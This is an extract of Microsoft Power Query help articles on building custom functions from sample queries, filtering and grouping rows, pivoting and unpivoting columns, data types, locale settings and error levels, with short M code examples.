7 Note
We recommend that you read the article on Parameters to better understand how
to create and manage parameters in Power Query.
The binary parameter type is only displayed inside the Parameters dialog Type
dropdown menu when you have a query that evaluates to a binary.
Rename the newly created query from File Parameter (2) to Transform Sample file.
Right-click this new Transform Sample file query and select the Create Function option.
This operation will effectively create a new function that will be linked with the
Transform Sample file query. Any changes that you make to the Transform Sample file
query will be automatically replicated to your custom function. During the creation of
this new function, use Transform file as the Function name.
After creating the function, you'll notice that a new group will be created for you with
the name of your function. This new group will contain:
All parameters that were referenced in your Transform Sample file query.
Your Transform Sample file query, commonly known as the sample query.
Your newly created function, in this case Transform file.
The first transformation that needs to happen to this query is one that will interpret the
binary. You can right-click the binary from the preview pane and select the CSV option
to interpret the binary as a CSV file.
The format of all the CSV files in the folder is the same. They all have a header that
spans the top four rows. The column headers are located in row five and the data
starts from row six downwards, as shown in the next image.
The next set of transformation steps that need to be applied to the Transform Sample
file are:
1. Remove the top four rows—This action will get rid of the rows that are considered
part of the header section of the file.
7 Note
To learn more about how to remove rows or filter a table by row position, go
to Filter by row position.
2. Promote headers—The headers for your final table are now in the first row of the
table. You can promote them as shown in the next image.
Power Query by default will automatically add a new Changed Type step after
promoting your column headers that will automatically detect the data types for each
column. Your Transform Sample file query will look like the next image.
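As a point of reference, the M behind the Transform Sample file query at this stage resembles the following sketch. The Csv.Document options and the automatically added Changed Type step are omitted here because they depend on the contents of your own files.
Power Query M
let
    // File Parameter holds the sample binary; the same steps run for every file
    // once they're wrapped in the Transform file function.
    Source = Csv.Document(#"File Parameter"),
    // Remove the four header rows at the top of each file.
    #"Removed Top Rows" = Table.Skip(Source, 4),
    // Promote the first remaining row to column headers.
    #"Promoted Headers" = Table.PromoteHeaders(#"Removed Top Rows", [PromoteAllScalars = true])
in
    #"Promoted Headers"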
7 Note
Your Transform file function relies on the steps performed in the Transform
Sample file query. However, if you try to manually modify the code for the
Transform file function, you'll be greeted with a warning that reads The definition
of the function 'Transform file' is updated whenever query 'Transform Sample
file' is updated. However, updates will stop if you directly modify function
'Transform file'.
7 Note
To learn more about how to choose or remove columns from a table, go to Choose
or remove columns.
Your function was applied to every single row from the table using the values from the
Content column as the argument for your function. Now that the data has been
transformed into the shape that you're looking for, you can expand the Output Table
column, as shown in the image below, without using any prefix for the expanded
columns.
You can verify that you have data from all files in the folder by checking the values in the
Name or Date column. For this case, you can check the values from the Date column, as
each file only contains data for a single month from a given year. If you see more than
one, it means that you've successfully combined data from multiple files into a single
table.
7 Note
What you've read so far is fundamentally the same process that happens during the
Combine files experience, but done manually.
We recommend that you also read the article on Combine files overview and
Combine CSV files to further understand how the combine files experience works
in Power Query and the role that custom functions play.
Now imagine a new requirement: the combined data should only include rows for a given
market. To make this requirement happen, create a new parameter called Market with the
text data type. For the Current Value, enter the value Panama.
With this new parameter, select the Transform Sample file query and filter the Country
field using the value from the Market parameter.
Applying this new step to your query will automatically update the Transform file
function, which will now require two parameters based on the two parameters that your
Transform Sample file uses.
But the CSV files query has a warning sign next to it. Now that your function has been
updated, it requires two parameters. So the step where you invoke the function results
in error values, since only one of the arguments was passed to the Transform file
function during the Invoked Custom Function step.
To fix the errors, double-click Invoked Custom Function in the Applied Steps to open
the Invoke Custom Function window. In the Market parameter, manually enter the
value Panama.
You can now check your query to validate that only rows where Country is equal to
Panama show up in the final result set of the CSV Files query.
For example, imagine a query that has several codes as a text string and you want to
create a function that will decode those values, as in the following sample table:
code
PTY-CM1090-LAX
LAX-CM701-PTY
PTY-CM4441-MIA
MIA-UA1257-LAX
LAX-XY2842-MIA
You start by having a parameter that has a value that serves as an example. For this case,
it will be the value PTY-CM1090-LAX.
From that parameter, you create a new query where you apply the transformations that
you need. For this case, you want to split the code PTY-CM1090-LAX into multiple
components:
Origin = PTY
Destination = LAX
Airline = CM
FlightID = 1090
The M code for that set of transformations is shown below.
Power Query M
let
    Source = code,
    SplitValues = Text.Split(Source, "-"),
    CreateRow = [
        Origin = SplitValues{0},
        Destination = SplitValues{2},
        Airline = Text.Start(SplitValues{1}, 2),
        FlightID = Text.End(SplitValues{1}, Text.Length(SplitValues{1}) - 2)
    ],
    RowToTable = Table.FromRecords({CreateRow}),
    #"Changed Type" = Table.TransformColumnTypes(
        RowToTable,
        {{"Origin", type text}, {"Destination", type text}, {"Airline", type text}, {"FlightID", type text}}
    )
in
    #"Changed Type"
7 Note
To learn more about the Power Query M formula language, go to Power Query M
formula language.
You can then transform that query into a function by doing a right-click on the query
and selecting Create Function. Finally, you can invoke your custom function into any of
your queries or values, as shown in the next image.
After a few more transformations, you can see that you've reached your desired output
and leveraged the logic for such a transformation from a custom function.
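As a sketch of what the invocation looks like in M, the Invoke custom function experience adds a column that calls the function for each row. Here, Decode Code is a hypothetical name for the function created from the query, and Source stands for the query that holds the code column.
Power Query M
// Add a column that invokes the custom function against the code column of each row.
= Table.AddColumn(Source, "Decoded", each #"Decode Code"([code]))
Because the function returns a one-row table, the new Decoded column can then be expanded to get the Origin, Destination, Airline, and FlightID columns.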
Promote or demote column headers
Article • 12/17/2022
When creating a new query from unstructured data sources such as text files, Power
Query analyzes the contents of the file. If Power Query identifies a different pattern for
the first row, it will try to promote the first row of data to be the column headings for
your table. However, Power Query might not identify the pattern correctly 100 percent
of the time, so this article explains how you can manually promote or demote column
headers from rows.
Before you can promote the headers, you need to remove the first four rows of the
table. To make that happen, select the table menu in the upper-left corner of the
preview window, and then select Remove top rows.
In the Remove top rows window, enter 4 in the Number of rows box.
7 Note
To learn more about Remove top rows and other table operations, go to Filter by
row position.
The result of that operation will leave the headers as the first row of your table.
Locations of the promote headers operation
From here, you have a number of places where you can select the promote headers
operation:
7 Note
Table column names must be unique. If the row you want to promote to a header
row contains multiple instances of the same text string, Power Query will
disambiguate the column headings by adding a numeric suffix preceded by a dot
to every text string that isn't unique.
To demote column headers to rows
In the following example, the column headers are incorrect: they're actually part of the
table's data. You need to demote the headers to be part of the rows of the table.
After you do this operation, your table will look like the following image.
As a last step, select each column and type a new name for it. The end result will
resemble the following image.
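For reference, the promote and demote operations map to two M functions. The following is only a sketch; the step names generated by the user interface may differ.
Power Query M
// Promote the first row of the table to column headers.
= Table.PromoteHeaders(Source, [PromoteAllScalars = true])

// Demote the current column headers back into the first row of the table.
= Table.DemoteHeaders(Source)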
See also
Filter by row position
Filter a table by row position
Article • 12/17/2022
Power Query has multiple options to filter a table based on the positions of its rows,
either by keeping or removing those rows. This article covers all the available methods.
Keep rows
The keep rows set of functions selects a set of rows from the table and removes any
rows that don't meet the criteria.
There are two places where you can find the Keep rows buttons:
In the data preview section in the middle of the Power Query window, you can see
the position of your rows on the left side of the table. Each row position is
represented by a number. The top row starts with position 1.
The result of that change will give you the output table you're looking for. After you set
the data types for your columns, your table will look like the following image.
Keep bottom rows
Imagine the following table that comes out of a system with a fixed layout.
This report always contains seven rows of data at the end of the report page. Above the
data, the report has a section for comments with an unknown number of rows. In this
example, you only want to keep those last seven rows of data and the header row.
To do that, select Keep bottom rows from the table menu. In the Keep bottom rows
dialog box, enter 8 in the Number of rows box.
The result of that operation will give you eight rows, but now your header row is part of
the table.
You need to promote the column headers from the first row of your table. To do this,
select Use first row as headers from the table menu. After you define data types for
your columns, you'll create a table that looks like the following image.
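As a sketch of the M behind this example, assuming Source is the original table, the Keep bottom rows operation translates roughly to the following formula, followed by the header promotion described above.
Power Query M
// Keep the last eight rows of the table: seven data rows plus the header row.
= Table.LastN(Source, 8)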
To keep a range of rows, select Keep range of rows from the table menu. In the Keep
range of rows dialog box, enter 6 in the First row box and 8 in the Number of rows box.
Similar to the previous example for keeping bottom rows, the result of this operation
gives you eight rows with your column headers as part of the table. Any rows above the
First row that you defined (row 6) are removed.
You can perform the same operation as described in Keep bottom rows to promote the
column headers from the first row of your table. After you set data types for your
columns, your table will look like the following image.
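The corresponding M sketch uses Table.Range, whose offset is zero-based, so keeping rows starting at row 6 translates to an offset of 5.
Power Query M
// Skip the first five rows, then keep the next eight rows.
= Table.Range(Source, 5, 8)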
Remove rows
This set of functions will select a set of rows from the table, remove them, and keep the
rest of the rows in the table.
There are two places where you can find the Remove rows buttons:
To remove the top rows, select Remove top rows from the table menu. In the Remove
top rows dialog box, enter 5 in the Number of rows box.
In the same way as the previous examples for "Keep bottom rows" and "Keep a range of
rows," the result of this operation gives you eight rows with your column headers as part
of the table.
You can perform the same operation as described in previous examples to promote the
column headers from the first row of your table. After you set data types for your
columns, your table will look like the following image.
Remove bottom rows
Imagine the following table that comes out of a system with a fixed layout.
This report always contains a fixed section or footer that occupies the last five rows of
the table. In this example, you want to remove those last five rows and keep the rest of
the data.
To do that, select Remove bottom rows from the table menu. In the Remove bottom
rows dialog box, enter 5 in the Number of rows box.
The result of that change will give you the output table that you're looking for. After you
set data types for your columns, your table will look like the following image.
Remove alternate rows
Imagine the following table that comes out of a system with a dynamic layout.
The way this report is structured is that you have elements in pairs of rows. Every odd
row (1, 3, 5...) contains the data that you need. Every even row, directly underneath each
odd row, contains comments about each of those records. You don't need the
comments, and you want to remove all of them.
To do that, select Remove alternate rows from the table menu. In the Remove alternate
rows dialog box, enter the following values:
Here you start defining the pattern for removing rows. After you find the second
row, you only want to remove that specific row, so you specify that you only need
to remove one row.
After you remove one row, you keep the next row. The process starts again for the
next row.
The result of that selection will give you the output table that you're looking for. After
you set the data types to your columns, your table will look like the following image.
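For reference, this pattern corresponds roughly to the Table.AlternateRows function, assuming Source is the original table.
Power Query M
// Keep row 1, then alternate: remove one row, keep one row, and repeat to the end of the table.
= Table.AlternateRows(Source, 1, 1, 1)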
Filter by values in a column
Article • 12/17/2022
In Power Query, you can include or exclude rows according to a specific value in a
column. You can choose from three methods to filter the values in your column:
After you apply a filter to a column, a small filter icon appears in the column heading, as
shown in the following illustration.
In this article, we'll focus on aspects related to filtering data. To learn more about
the sort options and how to sort columns in Power Query, go to Sort columns.
Remove empty
The Remove empty command applies two filter rules to your column. The first rule gets
rid of any null values. The second rule gets rid of any blank values. For example, imagine
a table with just one text column with five rows, where you have one null value and one
blank cell.
7 Note
A null value is a specific value in the Power Query language that represents no
value.
You then select Remove empty from the sort and filter menu, as shown in the following
image.
You can also select this option from the Home tab in the Reduce Rows group in the
Remove Rows drop-down options, as shown in the next image.
The result of the Remove empty operation gives you the same table without the empty
values.
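As a sketch, the Remove empty command generates a row filter like the following, where Column1 is a hypothetical column name.
Power Query M
// Keep only rows where the column is neither null nor an empty string.
= Table.SelectRows(Source, each [Column1] <> null and [Column1] <> "")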
Clear filter
When a filter is applied to a column, the Clear filter command appears on the sort and
filter menu.
Auto filter
The list in the sort and filter menu is called the auto filter list, which shows the unique
values in your column. You can manually select or deselect which values to include in the
list. Any selected values will be taken into consideration by the filter; any values that
aren't selected will be ignored.
This auto filter section also has a search bar to help you find any values from your list.
7 Note
When you load the auto filter list, only the top 1,000 distinct values in the column
are loaded. If there are more than 1,000 distinct values in the column that you're
filtering, a message will appear indicating that the list of values in the filter
list might be incomplete, and the Load more link appears. Select the Load more
link to load another 1,000 distinct values.
If exactly 1,000 distinct values are found again, the list is displayed with a
message stating that the list might still be incomplete.
If fewer than 1,000 distinct values are found, the full list of values is shown.
Power Query displays a type-specific filter based on the data type of the column.
Type-specific filters
Depending on the data type of your column, you'll see different commands in the sort
and filter menu. The following images show examples for date, text, and numeric
columns.
Filter rows
When selecting any of the type-specific filters, you'll use the Filter rows dialog box to
specify filter rules for the column. This dialog box is shown in the following image.
The Filter rows dialog box has two modes: Basic and Advanced.
Basic
With basic mode, you can implement up to two filter rules based on type-specific filters.
In the preceding image, notice that the name of the selected column is displayed after
the label Keep rows where, to let you know which column these filter rules are being
implemented on.
For example, imagine that in the following table, you want to filter the Account Code by
all values that start with either PA or PTY.
To do that, you can go to the Filter rows dialog box for the Account Code column and
specify the set of filter rules you want.
In this example, first select the Basic button. Then under Keep rows where "Account
Code", select begins with, and then enter PA. Then select the or button. Under the or
button, select begins with, and then enter PTY. Then select OK.
The result of that operation will give you the set of rows that you're looking for.
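For reference, this basic filter corresponds roughly to the following row selection in M.
Power Query M
// Keep rows where Account Code begins with either PA or PTY.
= Table.SelectRows(Source, each Text.StartsWith([Account Code], "PA") or Text.StartsWith([Account Code], "PTY"))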
Advanced
With advanced mode, you can implement as many type-specific filters as necessary from
all the columns in the table.
For example, imagine that instead of applying the previous filter in basic mode, you
wanted to implement a filter to Account Code to show all values that end with 4. Also,
you want to show values over $100 in the Sales column.
In this example, first select the Advanced button. In the first row, select Account Code
under Column name, ends with under Operator, and enter 4 for the Value. In the
second row, select and, and then select Sales under Column name, is greater than
under Operator, and 100 under Value. Then select OK.
The result of that operation will give you just one row that meets both criteria.
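The advanced filter translates to a single row selection that combines both conditions, roughly as follows.
Power Query M
// Keep rows where Account Code ends with 4 and Sales is greater than 100.
= Table.SelectRows(Source, each Text.EndsWith([Account Code], "4") and [Sales] > 100)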
7 Note
You can add as many clauses as you'd like by selecting Add clause. All clauses act
at the same level, so you might want to consider creating multiple filter steps if you
need to implement filters that rely on other filters.
Choose or remove columns
Article • 12/17/2022
Choose columns and Remove columns are operations that help you define what
columns your table needs to keep and which ones it needs to remove. This article will
showcase how to use the Choose columns and Remove columns commands by using
the following sample table for both operations.
The goal is to create a table that looks like the following image.
Choose columns
On the Home tab, in the Manage columns group, select Choose columns.
The Choose columns dialog box appears, containing all the available columns in your
table. You can select all the fields that you want to keep and remove specific fields by
clearing their associated check box. For this example, you want to remove the GUID and
Report created by columns, so you clear the check boxes for those fields.
After selecting OK, you'll create a table that only contains the Date, Product,
SalesPerson, and Units columns.
Remove columns
When you select Remove columns from the Home tab, you have two options:
After selecting Remove columns, you'll create a table that only contains the Date,
Product, SalesPerson, and Units columns.
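Both commands map to simple M calls. The following sketch shows the two equivalent approaches for this example.
Power Query M
// Choose columns: keep only the listed columns.
= Table.SelectColumns(Source, {"Date", "Product", "SalesPerson", "Units"})

// Remove columns: drop the listed columns and keep the rest.
= Table.RemoveColumns(Source, {"GUID", "Report created by"})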
Grouping or summarizing rows
In Power Query, you can group values in various rows into a single value by grouping
the rows according to the values in one or more columns. You can choose from two
types of grouping operations:
Column groupings.
Row groupings.
Operations available
With the Group by feature, the available operations can be categorized in two ways:
Percentile: Column operation. Calculates the percentile, using an input value from 0 to 100, from a column.
Count distinct values: Column operation. Calculates the number of distinct values from a column.
Count rows: Row operation. Calculates the total number of rows from a given group.
Count distinct rows: Row operation. Calculates the number of distinct rows from a given group.
All rows: Row operation. Outputs all grouped rows in a table value with no aggregations.
7 Note
The Count distinct values and Percentile operations are only available in Power
Query Online.
For this example, group the table by using the following Group by columns:
Country
Sales Channel
After that operation is complete, notice how the Products column has [Table] values
inside each cell. Each [Table] value contains all the rows that were grouped by the
Country and Sales Channel columns from your original table. You can select the white
space inside the cell to see a preview of the contents of the table at the bottom of the
dialog box.
7 Note
The details preview pane might not show all the rows that were used for the group-
by operation. You can select the [Table] value to see all rows pertaining to the
corresponding group-by operation.
Next, you need to extract the row that has the highest value in the Units column of the
tables inside the new Products column, and call that new column Top performer
product.
To do so, add a custom column: on the Add column tab, select Custom column. Name your
new column Top performer product. Enter the formula Table.Max([Products], "Units")
under Custom column formula.
The result of that formula creates a new column with [Record] values. These record
values are essentially a table with just one row. These records contain the row with the
maximum value for the Units column of each [Table] value in the Products column.
With this new Top performer product column that contains [Record] values, you can
select the expand icon, select the Product and Units fields, and then select OK.
After removing your Products column and setting the data type for both newly
expanded columns, your result will resemble the following image.
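Putting the pieces together, the M generated for this example resembles the following sketch. The step names produced by the user interface may differ, and Source stands for the original sales table.
Power Query M
let
    // Group all rows by Country and Sales Channel, keeping the grouped rows as nested tables.
    #"Grouped Rows" = Table.Group(Source, {"Country", "Sales Channel"}, {{"Products", each _, type table}}),
    // For each group, pick the record (row) with the highest value in the Units column.
    #"Added Custom" = Table.AddColumn(#"Grouped Rows", "Top performer product", each Table.Max([Products], "Units")),
    // Expand the Product and Units fields from the record.
    #"Expanded Record" = Table.ExpandRecordColumn(#"Added Custom", "Top performer product", {"Product", "Units"}, {"Product", "Units"}),
    // Remove the nested Products column.
    #"Removed Columns" = Table.RemoveColumns(#"Expanded Record", {"Products"})
in
    #"Removed Columns"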
Fuzzy grouping
To demonstrate how to do "fuzzy grouping," consider the sample table shown in the
following image.
The goal of fuzzy grouping is to do a group-by operation that uses an approximate
match algorithm for text strings. Power Query uses the Jaccard similarity algorithm to
measure the similarity between pairs of instances. Then it applies agglomerative
hierarchical clustering to group instances together. The following image shows the
output that you expect, where the table will be grouped by the Person column.
To do the fuzzy grouping, you perform the same steps previously described in this
article. The only difference is that this time, in the Group by dialog box, you select the
Use fuzzy grouping check box.
For each group of rows, Power Query will pick the most frequent instance as the
"canonical" instance. If multiple instances occur with the same frequency, Power Query
will pick the first one. After you select OK in the Group by dialog box, you'll get the
result that you were expecting.
However, you have more control over the fuzzy grouping operation by expanding Fuzzy
group options.
The following options are available for fuzzy grouping:
Similarity threshold (optional): This option indicates how similar two values must
be to be grouped together. The minimum setting of 0 will cause all values to be
grouped together. The maximum setting of 1 will only allow values that match
exactly to be grouped together. The default is 0.8.
Ignore case: When comparing text strings, case will be ignored. This option is
enabled by default.
Group by combining text parts: The algorithm will try to combine text parts (such
as combining Micro and soft into Microsoft) to group values.
Show similarity scores: Show similarity scores between the input values and the
computed representative values after fuzzy grouping. Requires the addition of an
operation such as All rows to showcase this information on a row-by-row level.
Transformation table (optional): You can select a transformation table that will
map values (such as mapping MSFT to Microsoft) to group them together.
For this example, a transformation table will be used to demonstrate how values can be
mapped. The transformation table has two columns:
From: The text string to look for in your table.
To: The text string used to replace the text string in the From column.
) Important
It's important that the transformation table has the same columns and column names
as shown above (they have to be named From and To); otherwise, Power Query won't
recognize it as a transformation table.
Return to the Group by dialog box, expand Fuzzy group options, change the operation
from Count rows to All rows, enable the Show similarity scores option, and then select
the Transformation table drop-down menu.
After you select the transformation table, select OK. The result of that operation gives
you the following information:
In this example, the Ignore case option was enabled, so the values in the From column
of the Transformation table are used to look for the text string without considering the
case of the string. This transformation operation occurs first, and then the fuzzy
grouping operation is performed.
The similarity score is also shown in the table value next to the Person column, which
reflects exactly how the values were grouped and their respective similarity scores. You
can expand this column if needed or use the values from the new Frequency columns
for other sorts of transformations.
7 Note
When grouping by multiple columns, the transformation table performs the replace
operation in all columns if replacing the value increases the similarity score.
See also
Add a custom column
Remove duplicates
Unpivot columns
Article • 12/17/2022
In Power Query, you can transform columns into attribute-value pairs, where columns
become rows.
For example, given a table like the following, where country rows and date columns
create a matrix of values, it's difficult to analyze the data in a scalable way.
Instead, you can transform the table into a table with unpivoted columns, as shown in
the following image. In the transformed table, it's easier to use the date as an attribute
to filter on.
The key in this transformation is that you have a set of dates in the table that should all
be part of a single column. The respective value for each date and country should be in
a different column, effectively creating an attribute-value pair.
Power Query will always create the attribute-value pair by using two columns:
Attribute: The name of the column headings that were unpivoted.
Value: The values that were underneath each of the unpivoted column headings.
There are multiple places in the user interface where you can find Unpivot columns. You
can right-click the columns that you want to unpivot, or you can select the command
from the Transform tab in the ribbon.
There are three ways that you can unpivot columns from a table:
Unpivot columns
Unpivot other columns
Unpivot only selected columns
Unpivot columns
For the scenario described above, you first need to select the columns you want to
unpivot. You can hold down Ctrl as you select as many columns as you need. For this
scenario, you want to select all the columns except the one named Country. After
selecting the columns, right-click any of the selected columns, and then select Unpivot
columns.
The result of that operation will yield the result shown in the following image.
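Under the covers, this selection typically generates a call to Table.UnpivotOtherColumns that lists the column you kept rather than the columns you selected, which is roughly why newly added date columns are also unpivoted on refresh. A sketch follows.
Power Query M
// Unpivot every column except Country into Attribute and Value columns.
= Table.UnpivotOtherColumns(Source, {"Country"}, "Attribute", "Value")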
Special considerations
After creating your query from the steps above, imagine that your initial table gets
updated to look like the following screenshot.
Notice that you've added a new column for the date 9/1/2020 (September 1, 2020), and
two new rows for the countries UK and Mexico.
If you refresh your query, you'll notice that the unpivot operation is applied to the new
column, but it doesn't affect the column that wasn't originally selected (Country, in this
example). This means that any new column that's added to the source table will be
unpivoted as well.
The following image shows what your query will look like after the refresh with the new
updated source table.
Unpivot other columns
You can also select the columns that you don't want to unpivot and unpivot the rest of
the columns in the table. This operation is where Unpivot other columns comes into
play.
The result of that operation will yield exactly the same result as the one you got from
Unpivot columns.
7 Note
This transformation is crucial for queries that have an unknown number of columns.
The operation will unpivot all columns from your table except the ones that you've
selected. This is an ideal solution if the data source of your scenario got new date
columns in a refresh, because those will get picked up and unpivoted.
Special considerations
Similar to the Unpivot columns operation, if your query is refreshed and more data is
picked up from the data source, all the columns will be unpivoted except the ones that
were previously selected.
To illustrate this, say that you have a new table like the one in the following image.
You can select the Country column, and then select Unpivot other columns, which will
yield the following result.
Unpivot only selected columns
The purpose of this last option is to only unpivot specific columns from your table. This
is important for scenarios where you're dealing with an unknown number of columns
from your data source and you only want to unpivot the selected columns.
To perform this operation, select the columns to unpivot, which in this example is all the
columns except the Country column. Then right-click any of the columns you selected,
and then select Unpivot only selected columns.
Notice how this operation will yield the same output as the previous examples.
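By contrast, this command typically generates a call to Table.Unpivot that lists just the selected columns, roughly as follows, which is why a column added later is left unchanged on refresh.
Power Query M
// Unpivot only the listed date columns; any other columns are left untouched.
= Table.Unpivot(Source, {"6/1/2020", "7/1/2020", "8/1/2020"}, "Attribute", "Value")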
Special considerations
After doing a refresh, if our source table changes to have a new 9/1/2020 column and
new rows for UK and Mexico, the output of the query will be different from the previous
examples. Say that our source table, after a refresh, changes to the table in the following
image.
The output of our query will look like the following image.
It looks like this because the unpivot operation was applied only on the 6/1/2020,
7/1/2020, and 8/1/2020 columns, so the column with the header 9/1/2020 remains
unchanged.
Pivot columns
Article • 12/17/2022
In Power Query, you can create a table that contains an aggregate value for each unique
value in a column. Power Query groups each unique value, does an aggregate
calculation for each value, and pivots the column into a new table.
This table contains values by country and date in a simple table. In this example, you
want to transform this table into the one where the date column is pivoted, as shown in
the following image.
7 Note
During the pivot columns operation, Power Query will sort the table based on the
values found on the first column—at the left side of the table—in ascending order.
To pivot a column
1. Select the column that you want to pivot. In this example, select the Date column.
2. On the Transform tab in the Any column group, select Pivot column.
3. In the Pivot column dialog box, in the Value column list, select Value.
By default, Power Query will try to do a sum as the aggregation, but you can select
the Advanced option to see other available aggregations.
The available options are:
Don't aggregate
Count (all)
Count (not blank)
Minimum
Maximum
Median
Sum
Average
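As a rough sketch, a pivot with the default Sum aggregation corresponds to the following M, assuming the Date column has already been converted to text so its values can become column names. Omitting the aggregation function corresponds to Don't aggregate.
Power Query M
// Pivot the distinct Date values into columns, summing the Value column for each cell.
= Table.Pivot(Source, List.Distinct(Source[Date]), "Date", "Value", List.Sum)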
In the Pivot column dialog box, select the Product column as the value column. Select
the Advanced option button in the Pivot columns dialog box, and then select Don't
aggregate.
The result of this operation will yield the result shown in the following image.
You want to pivot that table by using the Date column, and you want to use the values
from the Value column. Because this pivot would make your table have just the Country
values on rows and the Dates as columns, you'd get an error for every single cell value
because there are multiple rows for every combination of Country and Date. The
outcome of the Pivot column operation will yield the results shown in the following
image.
Notice the error message "Expression.Error: There were too many elements in the
enumeration to complete the operation." This error occurs because the Don't aggregate
operation only expects a single value for the country and date combination.
Transpose a table
Article • 12/17/2022
The transpose table operation in Power Query rotates your table 90 degrees, turning
your rows into columns and your columns into rows.
Imagine a table like the one in the following image, with three rows and four columns.
The goal of this example is to transpose that table so you end up with four rows and
three columns.
The result of that operation will look like the following image.
7 Note
Only the contents of the table will be transposed during the transpose operation;
the column headers of the initial table will be lost. The new columns will have the
name Column followed by a sequential number.
The headers you need in this example are in the first row of the table. To promote the
first row to headers, select the table icon in the upper-left corner of the data preview,
and then select Use first row as headers.
The result of that operation will give you the output that you're looking for.
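As a sketch in M, the whole example comes down to a transpose followed by a header promotion, assuming Source is the original three-row, four-column table.
Power Query M
let
    // Rotate the table: rows become columns and columns become rows.
    Transposed = Table.Transpose(Source),
    // Promote the first row (the original header values) to column headers.
    #"Promoted Headers" = Table.PromoteHeaders(Transposed, [PromoteAllScalars = true])
in
    #"Promoted Headers"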
7 Note
To learn more about the promote headers operation, also known as Use first row
as headers, go to Promote or demote column headers.
Reverse rows
Article • 12/17/2022
With Power Query, it's possible to reverse the order of rows in a table.
Imagine a table with two columns, ID and Country, as shown in the following image.
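The Reverse rows command maps to a single M function, sketched below.
Power Query M
// Return the rows of the table in reverse order.
= Table.ReverseRows(Source)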
Data types in Power Query
Data types in Power Query are used to classify values to have a more structured dataset.
Data types are defined at the field level—values inside a field are set to conform to the
data type of the field.
The data type of a column is displayed on the left side of the column heading with an
icon that symbolizes the data type.
7 Note
The most common data types used in Power Query are listed in the following table.
Although beyond the scope of this article, you can find the complete list of data types in
the Power Query M formula language Types article.
Fixed decimal number: Also known as the Currency type, this data type has a fixed
location for the decimal separator. The decimal separator always has four digits to its
right and allows for 19 digits of significance. The largest value it can represent is
922,337,203,685,477.5807 (positive or negative). Unlike Decimal Number, the Fixed
Decimal Number type is always precise and is thus useful in cases where the imprecision
of floating-point notation might introduce errors.
Date/Time: Represents both a date and time value. Underneath the covers, the Date/Time
value is stored as a Decimal Number type, so you can actually convert between the two.
The time portion of a date is stored as a fraction to whole multiples of 1/300 seconds
(3.33 ms). Dates between the years 1900 and 9999 are supported.
Date: Represents just a date (no time portion). When converted into the model, a Date is
the same as a Date/Time value with zero for the fractional value.
Time: Represents just time (no date portion). When converted into the model, a Time
value is the same as a Date/Time value with no digits to the left of the decimal place.
Binary: The Binary data type can be used to represent any other data with a binary
format.
Any: The Any data type is the status given to a column that doesn't have an explicit data
type definition. Any is the data type that classifies all values. We recommend that you
always explicitly define the column data types for your queries from unstructured
sources, and avoid having any columns with the Any data type as the output of your
query.
For structured data sources such as databases, Power Query reads the table schema
from the data source and automatically displays the data by using the correct data
type for each column.
For unstructured sources such as Excel, CSV, and text files, Power Query automatically
detects data types by inspecting the values in the table. By default, automatic data
type detection is enabled in Power Query for unstructured sources.
You can also use the Detect data type command in the Any column group on the
Transform tab to automatically detect the data types of the columns in your table.
How to define a column data type
You can define or change the data type of a column in any of four places:
On the Home tab, in the Transform group, on the Data type drop-down menu.
On the Transform tab, in the Any column group, on the Data type drop-down
menu.
Promote column headers: Promotes the first row of the table to be the column
header.
Changed type: Converts the values from the Any data type to a data type based
on the inspection of the values from each column.
By default, automatic data type detection is enabled. To disable or enable this setting,
follow the steps that apply to your Power Query experience.
You can define this behavior both at the global and per-file level in the Options window
(in the Power Query Editor, on the File tab, select Options and settings > Options).
Global: On the left pane under Global, select Data load. On the right pane under
Type detection, you can select any of three type detection configurations that will
be applied to every new file created in your application:
Always detect column types and headers for unstructured sources
Detect column types and headers for unstructured sources according to each
file's setting
Never detect column types and headers for unstructured sources
Current file: On the left pane under Current file, select Data load. On the right
pane under Type detection, select whether you want to enable or disable type
detection for the current file.
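The two automatically added steps described earlier correspond to two M functions. The following is a minimal sketch of those steps as they would appear inside the query's let expression, assuming a previous step named Source; the column names and data types here are illustrative, not necessarily what Power Query generates for your file.

Power Query M
// Promote column headers: use the first row of the table as the column headers
PromotedHeaders = Table.PromoteHeaders(Source, [PromoteAllScalars = true]),
// Changed type: convert the Any-typed columns to the detected data types
ChangedType = Table.TransformColumnTypes(
    PromotedHeaders,
    {{"Date", type date}, {"Country", type text}, {"Units", Int64.Type}}
)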
Document or project locale
Power Query handles two distinct components that manage the way that things look
and are interpreted:
Localization: the component that tells Power Query in what language it should be
displayed.
Globalization: the component that handles the formatting of the values, in addition
to the interpretation of text values.
Locale is a single value that holds both the localization and globalization components.
Locale is used to interpret text values and convert them into other data types. For
example, the locale English (United States) means that the localization is in United
States English and the globalization, or format of the value, is based on the standards
used in the United States.
When Power Query defines a column data type or converts from one data type to
another, it has to interpret the values to be converted before it can transform them to a
different data type.
In Power Query for Desktop, Power Query automatically recognizes your operating
system regional format and uses that to interpret the values for data type
conversion. To override this locale configuration, open the query Options window,
and in the left pane under Current file, select Regional settings. From here, you
can change the locale to the setting you want.
This locale setting is important for interpreting text values into a specific data type. For
example, imagine that you have your locale set as English (United States), but a column
in one of your CSV files has dates formatted in the United Kingdom format of
day/month/year.
When you try setting the data type of the Date column to be Date, you get error values.
These errors occur because the locale being used is trying to interpret the date in the
English (United States) format, which is month/day/year. Because there's no month 22 in
the calendar, it causes an error.
Instead of trying to just select the Date data type, you can right-click the column
heading, select Change type, and then select Using locale.
In the Change column type with locale dialog box, you select the data type that you
want to set, but you also select which locale to use, which in this case needs to be
English (United Kingdom).
Using this locale, Power Query will be able to interpret values correctly and convert
those values to the right data type.
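In M, the equivalent step uses the optional culture argument of Table.TransformColumnTypes. This sketch assumes the previous step is named Source and the column is named Date; "en-GB" is the culture code for English (United Kingdom).

Power Query M
// Interpret the text values as dates using the English (United Kingdom) locale
= Table.TransformColumnTypes(Source, {{"Date", type date}}, "en-GB")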
The formatting of the values is driven by the globalization value. If you have any doubts
about the value displayed by Power Query, you can verify the conversion of date values
by adding new columns for the day, month, and year from the value. To do this, select
the Date column and go to the Add column tab on the ribbon. In the Date and time
column group, you'll see the options for a date column.
From here, you can extract parts of the date value, such as the year number, the month
number, the day number, or even more columns extracted from the Date column.
By using these columns, you can verify that your date value has been converted
correctly.
Conversion in this matrix starts with the original data type in the Data types
column. Each result of a conversion to the new type is shown in the original data
type’s row.
The matrix covers the Decimal number, Currency, Whole number, Percentage, Date/Time,
Date, Time, Date/Time/Timezone, Duration, Text, and True/False data types. In each cell,
an icon indicates whether the conversion from the row's data type to the column's data
type is possible or not possible.
Errors in Power Query can occur at two levels:
Step-level errors
Cell-level errors
This article provides suggestions for how to fix the most common errors you might find
at each level, and describes the error reason, error message, and error detail for each.
Step-level error
A step-level error prevents the query from loading and displays the error components in
a yellow pane.
Error reason: The first section before the colon. In the example above, the error
reason is Expression.Error.
